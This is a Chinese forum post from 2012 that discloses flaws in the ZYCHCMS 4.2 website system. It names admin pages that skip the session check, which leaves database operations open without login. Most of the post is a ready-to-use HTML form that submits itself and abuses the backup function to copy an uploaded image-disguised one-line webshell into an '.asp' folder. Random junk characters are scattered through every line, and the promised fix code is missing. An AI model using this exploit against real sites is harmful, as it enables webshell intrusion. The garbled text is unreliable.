! h6 H# A+ |, ]- J! d! G& D# _3 F# @9 J' Y9 c! Y8 y
) A+ h2 [9 E! e6 s1 i; U6 K. C1 T" ~" R% u# M, w
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
0 I6 F a7 b/ \5 x ①SQL注射漏洞9 ]3 k" A7 w" `% ~4 v' R
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
! ^# e1 s0 T6 [% Q3 f3 C4 c* F( g7 U 漏洞原因:未过滤
. q3 _+ K- t( A, c+ V! a/ X# J9 T4 P 漏洞代码:
5 Y( [3 @+ c* O8 i 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。2 N7 x* G# s+ i8 i3 c4 C6 |
修复方法:在文件开头加入代码
I3 e1 X9 \/ p/ [
! A0 d3 H$ [1 F. R+ t- j3 Y
8 a, n4 f4 V: T8 Q& o5 [②后台拿WBSHELL
$ m, T2 `' j2 H- d2 @& C. w 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
2 L4 N6 X- s* R 这里在网上找了一个,改了下,将就着用。
7 d4 [7 k' t. K# t 以下是代码本地提交代码4 O! Q% m% y" c7 C7 p
% _# c" S: I7 @- O
6 J, U. f6 b& p3 N/ ?6 y
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>. A9 h( R* N+ A
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>! Y& l$ C& o2 S g
<tr>
P- Z! D8 @/ n' v- G <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
}7 R; [9 F8 { </tr>" U- f5 A/ n' O/ V
<tr>+ u8 u: `# O9 Q. X$ R7 g
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
; C; b5 W( ?) Z, o </span>$ a$ `. F) `, S6 ]- E) c% U9 I
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
, g% e; t1 a* ~( F <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >* n0 K, d% G. g; X; T* W6 E
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
% @3 w c9 F6 l# L <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d- ]0 x* z- X' x" G8 [
<div align=”left”>2 p/ P, h7 K3 `1 n$ |7 W2 z5 Z
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
6 r$ H; F1 ~9 O& @5 V0 b' |) H <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>* g8 F9 A7 Y, o
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />) G* V/ i' Z( g* l
</div></td>
- F" f% f7 x1 J, G" }, E5 u1 s! K </tr>9 M) ^( |3 ]6 i# d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
. P- k8 S Y) g4 P8 U/ S <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
+ U: \& m6 q: o' D. r) k <td class=”td”><div align=”left”>
% g1 k# B" S" H$ z# k) i5 w <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
: r* M2 Y; \, y [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! \+ b& S4 s6 n4 I! ]1 D( y0 S; H) ` </tr>. P$ J8 N$ H3 D6 d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>: ]9 @2 w. X* r; s# S' i' ?, g
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
* H# y) ? \7 H& B. ^/ ?& U <td class=”td”><div align=”left”>- E" o5 D' \/ J0 {) z$ B! r) H
<input type=”submit” value=”确定备份” class=”btn”" v/ ]+ A, @8 ^8 H2 R
</div></td>& Z7 ?' }4 T0 c5 z
</tr>
A5 i3 D: S: P" E </table></td></tr></form>
B/ X3 d& R5 j- C" X: g </table>
" i! }3 C, x6 a' `- { t </td>
6 m1 O' o/ \, o g: |" {: f </tr>/ R3 X: h' E; B" q1 _
</table>
7 b9 D8 j* b7 e8 S- }3 L/ w3 Z) e <script>% j: B9 K- M" i) c0 i9 W3 D2 w7 Q
document.all.add.submit();
% ^$ ^7 Z4 C6 f; w& ]/ o1 u </script>4 l! ~# L+ Q K" G+ K
& q3 N* M% i6 Y8 j( h8 ~# y& K& ?' A( u' V& q
5 I4 n9 z( C$ T7 N+ I, i5 D% x ^" ?& L. x( n! J
4 p2 f, N% R3 e' P/ D0 y3 W3 A4 _
0 }( C4 w; j) }! b0 K
) L* F. A# A. O, w% \# t; B' e
7 q8 \! [% z2 _6 [1 o4 U% ]
3 |% B' O; M0 b2 O& t2 f, g9 s/ @* X; D5 H7 X Y
|
发表于 2012-9-10 21:09:51
收藏
支持
反对